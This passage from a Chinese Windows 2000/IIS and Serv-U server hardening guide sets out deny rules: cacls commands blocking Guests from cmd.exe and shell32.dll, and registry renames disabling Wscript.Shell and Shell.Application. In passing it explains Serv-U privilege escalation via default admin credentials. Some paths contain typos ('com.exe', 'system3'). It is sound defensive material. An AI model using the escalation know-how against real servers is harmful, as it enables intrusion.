　　3、目录安全性设置：在站点属性中选择目录安全性，点击匿名访问和验证控制，选择允许匿名访问，点击编辑。如下图所示。删除默认用户，浏览选择对应于前面为cert网站设定的用户，并输入密码。可以选中允许IIS控制密码。这样设定的目的是为了防止一些像站长助手、海洋等木马的跨目录跨站点浏览，可以有效阻止这类的跨目录跨站入侵。

　　4、可写目录执行权限设置：关闭所有可写目录的执行权限。由于程序方面的漏洞，目前非常流行上传一些网页木马，绝大部分都是用web进行上传的。由于不可写的目录木马不能进行上传，如果关闭了可写目录的执行权限，那么上传的木马将不能正常运行。可以有效防止这类形式web入侵。

　　5、处理运行错误：这里有两种方法，一是关闭错误回显。IIS属性――主目录――配置――应用程序调试――脚本错误消息，选择发送文本错误信息给客户。二是定制错误页面。在IIS属性――自定义错误信息，在http错误信息中双击需要定制的错误页面，将弹出错误映射属性设置框。消息类型有默认值、URL和文件三种，可以根据情况自行定制。这样一方面可以隐藏一些错误信息，另外一方面也可以使错误显示更加友好。

　　四、配置FTP

　　Ftp是绝大部分虚拟主机提供商必备的一项服务。用户的站内文件大部分都是使用ftp进行上传的。目前使用的最多的ftp服务器非Serv-U莫属了。这里有几点需要说明一下。
　　
　　1、管理员密码必须更改

　　如果入侵爱好者们肯定对Serv-U提权再熟悉莫过了。这些提权工具使用的就是Serv-U默认的管理员的帐号和密码运行的。因为Serv-U管理员是以超级管理员的身份运行的。如果没有更改管理员密码，这些工具使用起来就再好用不过了。如果更改了密码，那这些工具要想正常运行，那就没那么简单喽。得先破解管理员密码才行。

　　2、更改安装目录权限

　　Serv-U的默认安装目录都是everyone可以浏览甚至可以修改的。安装的时候如果选择将用户信息存储在ini文件中，则可以在ServUDaemon.ini得到用户的所有信息。如果Guests有修改权限，那么黑客就可以顺利建立具有超级权限的用户。这可不是一件好事。所以在安装好Serv-U之后，得修改相应的文件夹权限，可以取消Guests用户的相应权限。
五、命令行相关操作处理

　　1、禁止guests用户执行com.exe：

　　我们可以通过以下命令取消guests执行com.exe的权限
    cacls C:\WINNT\system3\Cmd.exe /e /d guests。

　　2、禁用Wscript.Shell组件：

　　Wscript.Shell可以调用系统内核运行DOS基本命令。可以通过修改注册表，将此组件改名，来防止此类木马的危害。HKEY_CLASSES_ROOT\Wscript.Shell\ 及HKEY_CLASSES_ROOT\Wscript.Shell.1\改名为其它的名字。将两项clsid的值也改一下HKEY_CLASSES_ROOT\Wscript.Shell\CLSID\项目的值和HKEY_CLASSES_ROOT\Wscript.Shell.1\CLSID\项目的值，也可以将其删除。

　　3、禁用Shell.Application组件

　　Shell.Application也可以调用系统内核运行DOS基本命令。可以通过修改注册表，将此组件改名，来防止此类木马的危害。HKEY_CLASSES_ROOT\Shell.Application\ 及HKEY_CLASSES_ROOT\Shell.Application.1\ 改名为其它的名字。将HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值HKEY_CLASSES_ROOT\Shell.Application\CLSID\项目的值更改或删除。同时，禁止Guest用户使用shell32.dll来防止调用此组件。使用命令：cacls C:\WINNT\system32\shell32.dll /e /d guests bbs.bitsCN.com中国网管论坛

　　4、FileSystemObject组件

　　FileSystemObject可以对文件进行常规操作可以通过修改注册表，将此组件改名，来防止此类木马的危害。对应注册表项为HKEY_CLASSES_ROOT\scripting.FileSystemObject\。可以禁止guests用户使用或直接将其删除。考虑到很多的上传都会使用到这个组件，为了方便，这里不建议更改或删除。

　　5、禁止telnet登陆
　　
　　在C:\WINNT\system32目录下有个login.cmd文件，将其用记事本打开，在文件末尾另取一行，加入exit保存。这样用户在登陆telnet时，便会立即自动退出。

　　注：以上修改注册表操作均需要重新启动WEB服务后才会生效。

　　六、端口设置
　　
　　端口窗体底端就是门，这个比喻非常形象。如果我们服务器的所有端口都开放的话，那就意味着黑客有好多门可以进行入侵。所以我个人觉得，关闭未使用的端口是一件重要的事情。在控制面板――网络与拨号连接――本地连接――属性――Internet协议（TCP/IP）属性，点击高级，进入高级TCP/IP设置，选择选项，在可选的设置中选择TCP/IP筛选，启用TCP/IP筛选。添加需要的端口，如21、80等，关闭其余的所有未使用的端口。

　　七、关闭文件共享

　　系统默认是启用了文件共享功能的。我们应给予取消。在控制面板――网络和拨号连接――本地连接――属性，在常规选项种，取消Microsoft 网络文件和打印共享。服务最少原则是保障安全的一项重要原则。非必要的服务应该给予关闭。系统服务可以在控制面板――管理工具――服务中进行设定。

　　八、关闭非必要服务

　　类似telnet服务、远程注册表操作等服务应给予禁用。同时尽可能安装最少的软件。这可以避免一些由软件漏洞带来的安全问题。有些网管在服务器上安装QQ，利用服务器挂QQ，这种做法是极度错误的。

　　九、关注安全动态及时更新漏洞补丁

　　更新漏洞补丁对于一个网络管理员来说是非常重要的。更新补丁，可以进一步保证系统的安全。